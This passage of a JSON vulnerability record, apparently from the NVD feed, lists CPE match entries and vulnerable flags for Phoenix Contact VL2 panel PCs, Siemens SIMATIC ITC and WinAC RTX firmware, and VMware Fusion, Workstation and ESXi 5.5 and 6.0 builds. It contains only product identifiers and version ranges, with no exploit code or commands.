                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl2_bpc_7000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl2_ppc_7000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl2_ppc_7000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl2_bpc_9000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl2_bpc_9000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl2_ppc_9000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl2_ppc_9000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl2_ppc7_1000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl2_ppc7_1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl2_ppc9_1000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl2_ppc9_1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl2_ppc12_1000_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl2_ppc12_1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:simatic_itc1500_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "3.1",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:simatic_itc1500:v3:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:simatic_itc1500_pro_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "3.1",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:simatic_itc1500_pro:v3:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:simatic_itc1900_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "3.1",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:simatic_itc1900:v3:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:simatic_itc1900_pro_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "3.1",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:simatic_itc1900_pro:v3:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:simatic_itc2200_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "3.1",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:simatic_itc2200:v3:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:simatic_itc2200_pro_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "3.1",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:simatic_itc2200_pro:v3:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:simatic_winac_rtx_\\(f\\)_2010_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "2010",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:simatic_winac_rtx_\\(f\\)_2010_firmware:2010:-:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:simatic_winac_rtx_\\(f\\)_2010_firmware:2010:sp1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:simatic_winac_rtx_\\(f\\)_2010_firmware:2010:sp2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:simatic_winac_rtx_\\(f\\)_2010:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:vmware:fusion:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "8.5.9",
                "versionStartIncluding": "8.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:vmware:workstation:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "12.5.8",
                "versionStartIncluding": "12.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:-:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201312101:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201312102:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201312401:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201312402:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201403101:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201403102:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201403201:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201403202:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201403203:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201403204:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201403205:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201403206:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201403207:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201403208:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201403209:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201403210:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201403211:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201404401:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201404402:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201404403:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201404420:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201406401:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201407101:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201407102:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201407401:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201407402:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201407403:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201407404:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201407405:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201409101:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201409201:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201409202:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201409203:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201409204:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201409205:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201409206:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201409207:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201410101:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201410401:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201410402:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201410403:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201410404:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201410405:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201410406:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201501101:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201501401:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201501402:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201501403:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201501404:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201501405:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201502401:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201504201:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201505101:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201505401:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201505402:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201505403:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201505404:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201509101:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201509102:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201509201:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201509202:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201509203:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201509204:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201509205:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201509206:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201509207:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201509208:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201509209:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201509210:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201509211:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201509212:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201509213:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201510401:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201512101:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201512102:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201512401:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201512402:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201512403:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201512404:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201601401:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201602401:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201608101:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201608102:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201608401:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201608402:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201608403:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201608404:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201608405:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201609101:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201609102:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201609401:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201609402:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201609403:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201612101:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201612102:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201612401:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201612402:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201703401:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201709101:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201709102:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201709103:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201709401:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201709402:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:5.5.0:550-201709403:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:-:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201504401:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201505401:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201507101:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201507102:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201507401:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201507402:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201507403:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201507404:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201507405:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201507406:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201507407:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201509101:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201509102:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201509201:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201509202:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201509203:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201509204:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201509205:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201509206:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201509207:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201509208:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201509209:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:vmware:esxi:6.0:600-201509210:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
